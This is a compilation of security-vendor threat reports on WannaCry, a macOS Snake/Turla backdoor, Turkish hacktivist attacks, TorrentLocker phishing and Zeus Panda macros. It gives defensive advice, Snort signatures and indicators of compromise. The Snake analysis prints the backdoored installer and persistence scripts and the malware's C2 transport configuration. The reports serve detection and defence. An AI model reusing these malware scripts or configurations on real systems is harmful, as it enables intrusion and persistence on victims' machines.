FAQ on the WanaCry ransomware outbreak

Last updated: May 16th 2017

A ransomware variant known as WanaCry/WanaCrypt0r has spread on a massive scale around the world since the 12th of May 2017. For more information about the context with regards to this WanaCry variant, see also our earlier blog. The section below outlines the frequently asked questions and corresponding answers.

Q: What makes this ransomware variant so dangerous?
A: This variant of WanaCry posesses the capability to spread itself as a so-called worm, beside the fact that the ransomware starts encrypting possible important data on systems. This means that the initial infection in a network is possibly not only system that could be impacted, but potentialy a large amount of systems in the internal network as well. This might result in your business processes coming to a grinding halt.

Q: What was the initial infection vector for the ransomware outbreak?
A: As there is no evidence that the initial infection vector is email, after 72 hours of research by the security community, Fox-IT believes the infection vector is more likely to be vulnerable machines directly exposing SMB to the internet.
At the moment it appears that the only confirmed infection vector is the usage of the ETERNALBLUE SMB exploit.

Q: Which versions of Windows are vulnerable?
A: The SMB exploit works on all versions of Windows, which have not yet been patched by MS17-010 on the 14th of March 2017, except for Windows 10 and Windows Server 2016, as they are already protected in the default configuration.

Q: What about Windows XP?
A: Microsoft has also released a patch for the unsupported operating systems Windows XP and Windows Server 2003.

Q: Are we safe from WanaCry if we apply the security update to Windows Server 2003?
A: Yes, but the patch KB4012598 applies specifically to this SMB exploit, known as ETERNALBLUE. However, similar NSA exploits, leaked by the Shadow Brokers, for vulnerabilities in Windows Server 2003 and Windows XP were published that lead to remote code execution (RCE). This includes the ERRATICGOPHER exploit for SMBv1 and the ESTEEMAUDIT exploit for RDP, which could be repurposed by malicious actors to create the next ransomworm.

Q: How many endpoints are affected?
A: The sinkhole statistics currently show a total of 160,000+ infections, this amount is still rapidly increasing.

Q: Should we block the ‘kill-switch’ domain on our firewall/proxy?
A: No you should not. When the malware is capable of reaching the ‘kill-switch’ domain it will not further spread the malware. Please note that when you block this domain, it will in fact continue spreading both internal and external.

Q: Is the kill switch domain being monitored (counting infections, origin infections)?
A: Yes the sinkhole statistics can be found here.

Q: Do we expect new attacks with the same Modus Operandi (MO)?
A: This is very likely, as this is a lucrative way of earning money for criminals. It is unknown at what moment in time a new attack will start and we do not have indications at this point in time that another campaign is scheduled.

Q: Where can I find the ‘kill switch’ domain?
A: Two ‘kill-switch’ domains have been seen in the wild:

iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Q: Is the malware persistant and will it become active after a reboot of the end point.
A: Yes, a registry run-key is added to the registry:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\ = “\tasksche.exe”

Q: How can I check if an endpoint was infected?
A: Though there is no specific script there are several specific indicators for this ransomware campaign which can be used to detect compromised machines, such as:

HKLM\SOFTWARE\WanaCrypt0r\\wd = “”
HKCU\Control Panel\Desktop\Wallpaper: “\@WanaDecryptor@.bmp”

Q: Is CIFS also vulnerable?
A: CIFS is a dialect of the SMBv1 protocol, and is impacted by this vulnerability.

Q: What impact will disabling SMB v1 have on end users?
A: Please note that this might differ depending on the situation. It is highly recommended to follow the best practices with regards to applying patches, meaning that a thorough impact assessment needs to take place to determine the actual impact of disabling SMBv1. Please note that at least those systems that could solely communicate via SMBv1 will be impacted, for example an old file sharing system.

Q: What are Anti-Virus vendors doing about this?
A: It seems logical that most cybersecurity companies are currently working on finding out all of the details that are related to this attack. It also seems very likely that all cybersecurity vendors are creating prevention and detection capabilities. Though new detection or prevention capabilities can only be applied if updates for these products are being downloaded and installed. We would not encourage customers to focus and wait on these vendors to prevent these kind of attacks but rather focus on installing the Microsoft update (MS17-010) that will prevent the spreading completely.

Q: What if infected laptops are currently offline because people are enjoying their weekends and are returning on monday?
A: It depends on which stage the infection is in the victim machine. If the machine has already been infected and was half way during the infection then it is very likely that the victim machine will continue encrypting files and start spreading when it will become active again. Therefor we strongly suggest to install the Microsoft update (MS17-010).

Q: What are the chances that a new campaign will be launched with more or improved functionality?
A: Based on our experience it is very likely that the same or other attacker(s) will start launching new campaigns rather sooner then later. We expect that they have learned from the small mistakes they have made in the initial version, such as not registering the ‘kill switch’ domain. They could also improve the malwares functionalities that can bypass current prevention or detection techniques. Therefor we strongly suggest to install the Microsoft update (MS17-010).

Additionally, the exploitation of this vulnerability will serve as an example for other (cyber) criminals seeking to achieve similar goals, so called copycats.

Q: Do we have to block the the ‘kill switch’ domain in the firewall, or other security controls like Proxy Servers?
A: NO! Do not block access to the unique ‘kill switch’ domain as infected clients will then start using the SMB exploit against reachable machines that are vulnerable.

The unique ‘kill-switch’ domain has been registrered by a known security researcher. By doing this the ransomware and the spreading mechanism used in the current malware campaign will not function.
If you block access to this domain then an infected client will start encrypting all of your files and will start spreading to available vulnerable devices.

Q: Does the ‘kill-switch’ domain need a valid HTTP connection or is resolving this domain name enough for the malware to stop functioning?
A: Yes, the ‘kill-switch’ domain does need a valid HTTP connection to a webserver listening on port 80. If the malware is not able to make a succesfull connection on port 80 it will start the ransomware and spreading process.

Q: Is the Linux Samba equivalent also vulnerable?
A: No, the Linux Samba protocol is not vulnerable to this exploit, only the Microsoft SMB protocol, without the latest Microsoft patch (MS17-010) installed, is affected.

Q: There are some reports of WannaCry variants with no ‘kill-switch’ functionality, have you seen this?
A: Yes, Fox-IT has this variant. It seems that someone modified the original malware sample. Likely with a common tool like hexedit. There has been another sample where the ‘kill switch’ domain has been completely patched out, thus resulting in a corrupt binary. Fox-IT is actively monitoring for new versions of the WanaCry ransomware.

Q: Has the ransomware’s implementation of the encryption process been looked at, to see if files are recoverable?
A: The crypto that is used in the malware seems to have been implemented in an unbreakable way. At this point decryption does not seem possible.

Q: Is there anything known about what group is behind this ransomware campaign?
A: Fox-IT, like other security researchers, is investigating connections of WanaCry to other known groups.

Massive outbreak of ransomware variant infects large amounts of computers around the world

Today, May 12th 2017, a ransomware variant known as WanaCry is being spread on a massive scale around the world.
Once a computer is infected it will attempt to infect other machines on the same network using a recently patched vulnerability in the Windows SMB protocol.

Update: We have published an FAQ to answer additional questions about the ransomware outbreak

Prevention

  • Apply Windows update MS17-010
  • Microsoft has also released a patch for Windows XP.
  • Disable the outdated protocol SMBv1
  • Do not allow connections to the RDP or SMB protocol directly from the internet
  • Isolate unpatched or unsupported systems from the internal network
  • Make back-ups and verify that they can be restored

About this campaign

This ransomware campaign is especially dangerous as it spreads itself through the internal network using a recently patched Windows vulnerability.
Once a machine is infected it will scan the entire internal network and infect vulnerable machines.

Machines are not required to be connected to the internet for the encryption process to take place.

The exploit used by this ransomware campaign was leaked by a group known as the ‘Shadow Brokers’ and has now been repurposed by the attackers behind this campaign to infect machines in internal networks. Microsoft has released a patch for this specific vulnerability (MS17-010) on March 14th 2017. Machines that have been patched are not vulnerable to the exploit, but could still be infected through other infection methods such as phishing e-mails.

Impact

After looking at the ransomware’s code Fox-IT noticed that the malware had a hardcoded kill switch which could disable all functionality.
Once the ransomware is running on a victim’s machine it tries to connect to the domain iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com.
If the connection succeeds, the binary exits and will not start encrypting files nor start spreading.

It appears that a fellow security researcher (@MalwareTechBlog) spotted the domain and found out it was not registered by the attackers.
This was a sloppy mistake by the hackers, given the large campaign it was engaged in.
This security researcher has registered the domain name and as soon it was replying to requests it seems that the kill switch in the malware became active. This means that anyone who has received the actual phishing email but did not open it yet appears to have been saved.
The domain seems to be registered at 17:08:04 CEST. This could be one of the possible exaplanations as to why the hardcoded Bitcoin wallets have not received a large amount of Bitcoins.

The large amount of damage caused today and all international press attention have given everybody a heads up of what to expect.
With the majority of the big organisations starting with their weekend, offices are closed. System administrators and security personal could use this weekend to take prevention, detection and response measures. If everyone comes back in the office by Monday and a new wave of phishing attacks would start, without a kill-switch, the damage could be far less than expected at this stage. Though we have learned a lot, the cyber criminals will have as well.

Detection

Snort signatures from Emerging Threats are available for the ETERNALBLUE exploit:

alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray"; flow:to_server,established; content:"|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|"; offset:4; depth:25; content:"|08 ff fe 00 08 41 00 09 00 00 00 10|"; within:12; fast_pattern; content:"|00 00 00 00 00 00 00 10|"; within:8; content:"|00 00 00 10|"; distance:4; within:4; pcre:"/^[a-zA-Z0-9+/]{1000,}/R"; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)
alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)

The ransomware itself communicates using the Tor protocol.

Infection vector

One of the confirmed infection vectors is the usage of the ETERNALBLUE exploit directly on machines which have SMB directly exposed to the internet.

This chapter previously stated that we were in the process of verifying if phishing e-mails were also an infection vector for the WanaCry ransomware. Thus far Fox-IT has found no evidence that any phishing e-mails were related to this specific ransomware outbreak, and we have therefor removed the related indicators from this blog.

Command and Control servers

  • cwwnhwhlz52ma.onion
  • gx7ekbenv2riucmf.onion
  • xxlvbrloxvriy2c5.onion
  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion

Bitcoin addresses

Available languages in the ransomware

  • m_bulgarian
  • m_chinese (simplified)
  • m_chinese (traditional)
  • m_croatian
  • m_czech
  • m_danish
  • m_dutch
  • m_english
  • m_filipino
  • m_finnish
  • m_french
  • m_german
  • m_greek
  • m_indonesian
  • m_italian
  • m_japanese
  • m_korean
  • m_latvian
  • m_norwegian
  • m_polish
  • m_portuguese
  • m_romanian
  • m_russian
  • m_slovak
  • m_spanish
  • m_swedish
  • m_turkish
  • m_vietnamese

 

 

Danny Heppener, Erik Schamper, Maarten van Dantzig & Frank Groenewegen
Fox-IT Threat Intelligence

Snake: Coming soon in Mac OS X flavour

Summary

Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks1.

Over the past year Fox-IT has been involved in multiple incident response cases where the Snake framework was used to steal sensitive information. Targets include government institutions, military and large corporates.

Researchers who have previously analyzed compromises where Snake was used have attributed the attacks to Russia2. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and targets more carefully selected.

The framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant was observed3.

Now, Fox-IT has identified a version of Snake targeting Mac OS X.
As this version contains debug functionalities and was signed on February 21st, 2017 it is likely that the OS X version of Snake is not yet operational.
Fox-IT expects that the attackers using Snake will soon use the Mac OS X variant on targets.

Functionality

For Windows versions the architecture of Snake typically consists of a kernel mode driver designed to hide the presence of several Snake components and to provide low-level access to network communication. Depending on the architecture of a targeted machine either kernel or user mode is used for network communication.

The OS X version of Snake is a port of the Windows version. References to explorer, Internet Explorer and Named Pipes are still present in the binary.

Install Adobe Flash Player.app

The Snake binary comes inside of a ZIP archive named Adobe Flash Player.app.zip which is a backdoored version of Adobe’s Flash Player installer.

The install.sh script is patched with the following lines:

#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/installd.sh" "${TARGET_PATH}/installd.sh"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/installd.sh"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RC

The installd.sh that is invoked contains the following code:

#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
${SCRIPT_DIR}/installdp ${FILE} n
fi

The shell script checks if installdp is already running, if not it will start with:

/Library/Scripts/installdp /Library/Scripts/queue#1 n

Persistence

The backdoor is persisted via Apple’s LaunchDaemon service:

$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist
{
"ProgramArguments" => [
0 => "/Library/Scripts/installd.sh"
]
"KeepAlive" => 1
"Label" => "com.apple.update"
"OnDemand" => 1
"POSIXSpawnType" => "Interactive"
}

Codesigning details

In order for an Application to be run on OS X it has to be signed with a valid certificate issued by Apple or it would be blocked by GateKeeper (unless configured otherwise). The following, likely stolen, developer certificate was used to sign the fake Adobe Flash installer which includes the Snake binary:

Executable=Install Adobe Flash Player.app/Install
Identifier=com.addy.InstallAdobeFlash
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=390 flags=0x0(none) hashes=12+3 location=embedded
Hash type=sha1 size=20
CandidateCDHash sha1=ffc1a65f9153c94999212fb8bd7e3950eca035ae
Hash choices=sha1
CDHash=ffc1a65f9153c94999212fb8bd7e3950eca035ae
Signature size=4231
Authority=Developer ID Application: Addy Symonds (EHWBRW848H)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Signed Time=21 Feb 2017 08:55:36
Info.plist entries=22
TeamIdentifier=EHWBRW848H
Sealed Resources version=2 rules=12 files=86
Internal requirements count=1 size=188

Fox-IT has informed Apple’s security team with the request to revoke the certificate.

Debug build

Several strings found throughout the binary indicate that this version is in fact a debug build.

fwrite("Usage: snake_test e[vent]|n[ormal]\n", 0x30uLL, 1uLL, *__stderrp_ptr);
fprintf(v16, "[%s:%s:%d] %s\n", "../../../snake/snake_test.c", "main", 86LL, err);

An interesting observation is the fact that the contents of a temporary file storing command output are converted using KOI8-R encoding, designed to cover the Russian language, which uses the Cyrillic alphabet.

ascii2uni(koi8_str, unicode_str, -1LL, "KOI8-R");

This indicates that the developers tested with Russian command output (encoded using the KOI8-R codepage). On systems where the command output is displayed in another language (and another codepage), text would be incorrectly respresented in Cyrillic characters.

Queue file

Builds of Snake generally contain a Queue file. Queue files are used to store Snake’s configuration data, module binaries and queued network packets.

$ python MM_snake_queuefile.py queue
OFFSET STREAM TYPE ID SIZE WRITTEN DATA
0x0000006c 00000001 0002 00000227 00000010 2017-02-10 12:23:22 '\x98\xa7w{\xc7\xcc4\x03-\xdcz\x0b\xc9,`\x1c'
0x000000bc 00000001 0002 00000228 00000010 2017-02-10 12:23:22 '\x90*\xa6\xc5c\x89H\xe2>\x9fS\x1f\xb2\x0b\xf8\xb7'
0x0000010c 00000001 0002 00000229 00000010 2017-02-10 12:23:22 '\x95\x9a\xdf\x82\xf8l\xbe.YR)\xcc\x1a{\xac\x8f'
0x0000015c 00000001 0002 000000df 00000009 2017-02-10 12:23:22 '300000\x00'
0x000001a5 00000001 0002 000000e0 00000009 2017-02-10 12:23:22 '600000\x00'
0x000001ee 00000001 0002 00000190 00000009 2017-02-10 12:23:22 '20000\x00'
0x00000237 00000001 0002 000000e1 00000009 2017-02-10 12:23:22 '4096\x00'
0x00000280 00000001 0002 000000e2 00000009 2017-02-10 12:23:22 '65536\x00'
0x000002c9 00000001 0002 00000143 00000009 2017-02-10 12:23:22 '4096\x00'
0x00000312 00000001 0002 00000144 00000009 2017-02-10 12:23:22 '65536\x00'
0x0000035b 00000001 0002 00000001 00000009 2017-02-10 12:23:22 '1000\x00'
0x000003a4 fffffffd 0002 00000229 00000010 2017-02-10 12:23:22 '\xfb \xb20\x87\xb9m\xa2\x80!\x80\xcc\x1aJbX'
0x000003f4 00000001 0002 00000008 00000011 2017-02-10 12:23:22 '0xfd4488e9\x00'
0x00000445 00000001 0002 00000009 00000009 2017-02-10 12:23:22 '0\x00'
0x0000048e 00000001 0002 00000064 00000009 2017-02-10 12:23:22 '2\x00'
0x000004d7 00000001 0002 00000065 00000021 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\x00'
0x00000538 00000001 0002 00000066 00000031 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\x00'
0x000005a9 00000001 0002 00000070 00000029 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\x00'
0x00000612 00000001 0002 00000071 00000019 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\x00'
0x0000066b 00000001 0002 000000c8 00000009 2017-02-10 12:23:23 '1\x00'
0x000006b4 00000001 0002 000000c9 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x0000071d 00000001 0002 000000d4 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'
0x00000786 00000001 0002 0000012c 00000009 2017-02-10 12:23:23 '1\x00'
0x000007cf 00000001 0002 0000012d 00000029 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\x00'
0x00000838 00000001 0002 00000138 00000029 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\x00'

The following transport chains are configured in this queue file:

enc.unix//tmp/.gdm-socket read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4
enc.frag.reliable.doms.unix//tmp/.gdm-selinux psk=R@gw1gBsRP!5!yj0
enc.http.tcp/car-service.effers.com:80 psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0

Obfuscated strings

Snake binaries contain strings that can be obtained through snake_name_get() call. These strings are stored as a pair of 0x40 byte blobs that are XOR-ed against each other. In this binary the blobs only contain placeholders that are yet to be replaced by the actual values, which is another indication that this Snake binary is not yet ready to deploy to targets.

00187e20 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|
00187e30 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|
00187e40 35 34 43 41 37 51 55 45 55 45 5f 50 41 54 48 5f |54CA7QUEUE_PATH_|
00187e50 55 4e 49 58 00 00 00 00 00 00 00 00 00 00 00 00 |UNIX............|
00187e60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00187ea0 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|
00187eb0 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|
00187ec0 35 34 43 41 37 4d 45 4a 49 52 4f 44 5f 50 41 54 |54CA7MEJIROD_PAT|
00187ed0 48 5f 44 41 52 57 49 4e 00 00 00 00 00 00 00 00 |H_DARWIN........|
00187ee0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

Indicators of compromise

Files

/Library/LaunchDaemons/com.adobe.update.plist
/Library/Scripts/installd.sh
/Library/Scripts/queue
/var/tmp/.ur-*
/tmp/.gdm-socket
/tmp/.gdm-selinux

SHA256:

b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea Install Adobe Flash Player.app.zip
5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060 Install
0a77f1b59c829a83d91a12c871fbd30c5c9d04b455f497e0c231cd21104bfea9 install.sh
7848f7808af02ba0466f3a0687cf949c4d29a2d94b035481a3299ec519aaaa30 Install Adobe Flash Player
d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2 Installdp
b6df610aa5c1254c3af5b2ff806562c4937704e4ac248577cdcd3e7e7b3578a0 com.adobe.update
6e207a375782e3c9d86a3e426cfa38eddcf4898b3556abc75889f7e01cc49506 installd.sh
92721d719b8085748fb66366d202457f6d38bfa108a2ecda71eee7e68f43a387 queue

Network

The following domain is configured in Snake's queue file for HTTP network transport:

car-service.effers.com

The resolving IP belongs to a Satellite communications provider:

83.229.87.11

Though Snake is typically spread using spear-phishing e-mails and watering hole attacks Fox-IT has not yet observed this sample being spread in the wild.

Jelle Vergeer, Krijn de Mik, Mitchel Sahertian, Maarten van Dantzig & Yun Zheng Hu
Fox-IT Threat Intelligence

References

Turkish hacktivists targeting the Netherlands: high noise, low impact

As a result of increased political tensions between The Netherlands and Turkey, a surge in activity from several Turkish hacker groups has been observed by Fox-IT.

Most activities observed thus far appear to be aimed at defacement and disruption of online Dutch infrastructure. Most of the methods and techniques used to achieve this goal are relatively simple and can be executed by an individual with basic knowledge and skills.

Targets of ‘disruption attacks’, in the form of Distributed Denial of Service (DDoS) attacks, appear to have been directly related to the conflict between Turkey and The Netherlands, with regards to the denial of two of Turkey’s ministers from visiting The Netherlands on March 11th 2017. Some of the targeted websites had difficulties defending against the DDoS attacks, such as stemwijzer.nl and kieskompas.nl, resulting in downtime, just one day before the Dutch elections.

List of Dutch DDoS targets

Defacements were seen across seemingly random Twitter accounts and Dutch websites, carried out by individuals which gathered on publically accessible hacking forums, where hackers were called to arms, using operation names such as Hollanda Operasyonu (translated: Holland Operation).

An example of a WordPress website (iwiweb.nl) defaced, using the recently disclosed WordPress content injection vulnerability, can be seen on the image below:

 

Most of these defacement attempts can be stopped by following basic security guidelines, such as regularly updating WordPress & other software installed on the webserver.

The full write-up describes several methods and techniques used by the Turkish hacker groups in order to compromise, deface or disrupt online Dutch infrastructure.

Download the write-up ‘Turkish Hacktivism targeting The Netherlands’

Ziggo ransomware phishing campaign still increasing in size

Introduction

Fox-IT’s Security Operations Center (SOC) observed fake Ziggo invoice e-mails, since October 6th 2016, linking to a ransomware variant known as TorrentLocker.

The group behind TorrentLocker has previously been observed using fake Dutch postal service emails imitating PostNL, back in 2014.  This distribution method of abusing local postal service names was seen in a lot of countries where this threat was active. This was also documented in CERT PL’s report ‘Going Postal’ published last year. After continuous takedowns of the fake invoice domains with the help of Abuse.CH, the group seized their activities in the Netherlands, near the end of 2014, but continued in several other countries around the world.

The switch from using fake track and trace e-mail messages from postal services (from 2014 till 2016), to using fake invoices from a local Dutch ISP known as Ziggo, is an interesting switch in the modus operandi of the group behind TorrentLocker.

The reach of this e-mail campaign is rapidly increasing as a result of TorrentLocker stealing the address books from its victims to expand its list of new targets. Every successful infection increases the reach of the malicious e-mail campaign significantly. 

Current phishing e-mail

The e-mail below is an example of the phishing e-mail, which mimics the real Ziggo invoice e-mails:

Example of Ziggo phishing e-mail

The e-mail above contains a link to a fake Ziggo page that will force the user to download a ZIP file with the supposed invoice inside. The ZIP file contains a JavaScript file which will, when executed by the victim, download the TorrentLocker ransomware from a compromised WordPress website. When the victim’s data is encrypted, TorrentLocker shows the screen below, still using the name ‘Crypt0L0cker’, as seen 2 years ago:

TorrentLocker lock screen

Indicators of compromise

Currently (October 6th 2016) active campaign distribution domain:

  • ziggo-online23.org / 212.92.97.28

Other Ziggo domains used in previous e-mail campaigns:

  • ziggo-online23.org
  • ziggo-online12.com
  • ziggo-online247.net
  • ziggo-online24.net
  • ziggo-online24.org
  • ziggo-factuur84.org
  • ziggo-factuur23.org

All domains registered by the group behind TorrentLocker are registered at REG.RU. With the continued effort of AbuseCH we have been taking down these domains as soon as they appear.

TorrentLocker initially communicates via SSL to several IPs to reach its command and control server. The current IP being used for this communication is:

  • 185.40.152.22

The certificate used for this SSL connection typically contains the following static information (more sample and information for these SSL certificates can be found on AbuseCH’s SSL Blacklist):

  • C=US, ST=Denial, L=Springfield, O=Dis

After the initial SSL connection, all other network communication is ran through Tor. Files encrypted by TorrentLocker will be appended by the ‘.enc’ extension. More details on the prevention of ransomware can be found in our earlier TorrentLocker blog: New Torrentlocker variant active in the Netherlands.

LinkedIn information used to spread banking malware in the Netherlands

Since early this morning (7th of June 2016, around 08:30 AM) the Fox-IT Security Operations Center started detecting a large amount of phishing e-mails containing a malicious Word document. This e-mail campaign appears to be targeting the Netherlands, using Dutch text in both the e-mail and Word document. The content of the e-mail:

Geachte Firstname Lastname,
RoleCompany
Wij schrijven u in verband met de factuur met nummer 014321463. De nota staat open sinds 9-jun-16. Het openstaande bedrag is 2,487.50 Euro. Vriendelijk verzoeken wij u het openstaande bedrag te betalen.
Betaling graag zo spoedig mogelijk.
Met vriendelijke groet,
A.E. De Kuiper, BEEREJAN HOLDING BV. Faisantenstraat 53 Hilversum 1211 PT Tel. +31180647000 Fax. +31294484970

The first name, last name, role and company name are all values that are taken from the LinkedIn page of the receiver of the phishing mail, giving the e-mail a very personalized look.

The subject of the e-mail contain the company name, with a semi-random invoice related subject. Some examples:

  • Company : De nota is nog niet betaald
  • Company – De nota is onbetaald gebleven
  • Company – Uw laatste factuur wacht op betaling

At this point Fox-IT cannot directly link this phishing campaign to the recent LinkedIn database leak.

The e-mail contains a Word document with a Macro.
The name of the document is also based on personal information of the receiver:

  • Company-Firstname-Lastname.doc

Screenshot phishing campagin

The content of the Word document appears to be scrambled, this is an attempt to trick the user into running the embedded Macro, in order to view the document.

The Macro retrieves a binary from the following (likely compromised) website:

  • ledpronto.com/app/office.bin (sha256: c1e21a06a1fa1de2998392668b6910ca2be0d5d9ecc39bd3e3a2a3ae7623400d)

The Fox-IT InTELL team has identified the retrieved malware as the Zeus Panda banking malware. Zeus Panda, in this case, always connects to the following domain & IP using SSL:

  • skorianial.com / 107.171.187.182

Zeus Panda is a type of banking malware based on Zeus source code, more information can be found here: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

The following SSL certificate is used by the Panda Zeus Command and Control server:

If you’ve opened the Word attachment and enabled the Macro, consider scanning your system with various anti-virus solutions.